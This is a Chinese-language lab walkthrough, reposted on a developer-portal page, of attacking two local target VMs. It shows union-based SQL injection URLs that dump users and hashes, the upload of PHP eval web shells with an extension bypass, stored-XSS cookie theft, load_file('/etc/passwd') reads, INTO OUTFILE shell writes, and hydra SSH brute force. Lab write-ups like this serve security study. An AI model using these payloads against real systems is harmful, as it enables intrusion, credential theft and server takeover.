1、sql注入靶机攻击php

首先搭建虚拟机 用kali扫描下当前网段netdiscover -r 192.168.2.0/24css

发现可疑ip地址192.168.2.129sql

并使用nmap扫描这个ip地址,发现其开放了ftp和http协议数据库

e20c51b5aaf58326c388cdd3d317f03c.png

打开该虚拟机提供的网页,发现该网站使用url传参,可能存在sql注入点cookie

0b68cd306e7676fec6125c918f215a1b.png

在id=1后加一个引号,网页报错 该网站存在sql注入漏洞ssh

06bd8c66592cf67662e2b02984bed40c.png

使用order by语句试出网站后台数据库表的列数 当order by 5 时网页报错 所以该查询涉及到四列元素xss

b451bd75da637a29636dcba57d215e66.png

使用联合查询 查看网页的显示位,获得显示位就能够显示数据库的名字 photoblog测试

http://192.168.2.129/cat.php?id=-2%20union%20select%201,database%20(),3,4网站

8ca4a077eecb6d60229f5611727210e7.png

获得数据库名字 能够查询数据库中有那些表http://192.168.2.129/cat.php?id=-2%20union%20select%201,group_concat(table_name),3,4%20from%20information_schema.tables%20where%20table_schema=%27photoblog%27url

f5196fac263ea025647988fd8b6441d5.png

通常状况下users表对咱们有用

http://192.168.2.129/cat.php?id=-2%20union%20select%201,group_concat(column_name),3,4%20from%20information_schema.columns%20where%20table_name=%27users%27

继续查询users表中列名,有变量名 id,login,password

54822940d5bdc4bd0dbb2715f47a34af.png

查看users表中的数据:id=1 login=admin password=8efe310f9ab3efeae8d410a8e0166eb2

http://192.168.2.129/cat.php?id=-1%20union%20select%201,group_concat(id,0x23,login,0x23,password),3,4%20from%20users

cac4521b2e86fce2b4c708dfc74c2733.png

MD5解密后,获得密码P4ssw0rd

97b01a1651e50db2fd6086aa0ce8e988.png

登陆到管理员页面

8ece4db9947c345471f945680e3b7776.png

尝试上传文件,<?php eval($_POST['a'])?>

发现nophp

bd963f820196a2af777ae09244e0a637.png

改完后缀名发现,能够绕过,并上传成功

24e7cc5194e0b7b1a2a5305ae88ce372.png

644890dac956c29f48c80f52c643ce62.png

http://192.168.2.129/admin/uploads/123456.pHp

4c3a7a9adb72363154b34b31232552f6.png

获得目录,菜刀链接

fbbe64e1e43c25670ca446456aa25f9d.png

2.xss靶机攻击

nmap 扫描192.168.2.130发现靶机开着80端口和ssh协议

2d998b595c673f6f9f5aebe8595df183.png

544fc54b413ea677fc4659554925430b.png

测试

3be0a5dd518b774b80b2d84e3bcc07d6.png

8e19194a8918ed7c2a7601d829a83ceb.png

有窗口弹出,证实存在漏洞

在靶机上留言

能够将任意登陆用户的cookie发送到指定ip 在指定 ip 接受 cookie 后能够伪形成登录者

登陆界面:使用密码和用户名进行登陆

09eed2b0a91a96bef2cc4c5dd7b88c7e.png

获取到的cookie

8763cbf8b24eb1ce5e84e2b98fc5ea21.png

使用cookie再次进行登陆:发现已经已admin的身份登陆进页面中。

cf461b4e02f6532e7f602e762c0c70b8.png

74051521e5aa431301901c4d16b04ffb.png

进入管理界面后,发现博客编辑界面存在sql注入漏洞

fc29edda825183dc9458951dff9e4525.png

e4c97cbb06c0a452d84e7e735f635dac.png

http://192.168.2.130/admin/edit.php?id=4 union select 1,2,3,4

发现2和3能够显示出来。

7e6b5d4777d6c8e0f212be8e82260b83.png

http://192.168.2.130/admin/edit.php?id=0 union select 1,2,load_file("/etc/passwd"),4

a63cc88246672b6b0d594c7b599d2d2f.png

能够读取passwd文件,可是不能读取shadow文件。

咱们尝试能不能建立一个文件。

在编辑页面发现错误提示中有/var/www/classes 目录,

03a361b84dd7aedfdbb58204205e26cf.png

尝试后发现/var/www/css 目录可写。

因而构造语句:

http://192.168.2.130/admin/edit.php?id=2%20union%20select%201,2,3,4%20into%20outfile%20%22/var/www/css/s.php%22

而后打开

http://192.168.2.130/css/s.php

4c0a1e9c169c0b2249893abb5c7072c3.png

说明s.php文件成功写入到/var/www/css 目录,下面将

写入z.php中,构造url为:

http://192.168.2.130/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20system($_GET[%27c%27]);%20?%3E%22,4%20into%20outfile%20%22/var/www/css/z.php%22

访问z.php,并使用uname -a获取系统信息。能够远程执行命令。

48547d378aeec5d64e22934dfc43c743.png

下面写入一句话木马,构造url:

http://192.168.179.130/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20@eval($_POST[%27chopper%27]);?%3E%22,4%20into%20outfile%20%22/var/www/css/dao.php%22

菜刀连接:

下面写入一句话木马,构造url:

http://192.168.2.130/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20@eval($_POST[%27chopper%27]);?%3E%22,4%20into%20outfile%20%22/var/www/css/dao.php%22

菜刀连接:

b4f0146235cf2c46dcdc505c6d78e06d.png

9adc6a14d4a32f1e2d1113eecc461cb8.png

发现机器开了ssh,所以用hydra爆破下:

882bf4101a6f9907d0a9e08866e94f61.png

ssh登录

deb896ac7a849795037d1bac686803a2.png

Logo
华为开发者空间

华为开发者空间,是为全球开发者打造的专属开发空间,汇聚了华为优质开发资源及工具,致力于让每一位开发者拥有一台云主机,基于华为根生态开发、创新。

更多推荐

cover

链表操作秘籍—通讯录管理全接触

avatar 华为开发者空间
cover

基于华为开发者空间,使用Apache Spark实现商品推荐算法

avatar 华为开发者空间
cover

基于华为开发者空间实现花卉识别

avatar 华为开发者空间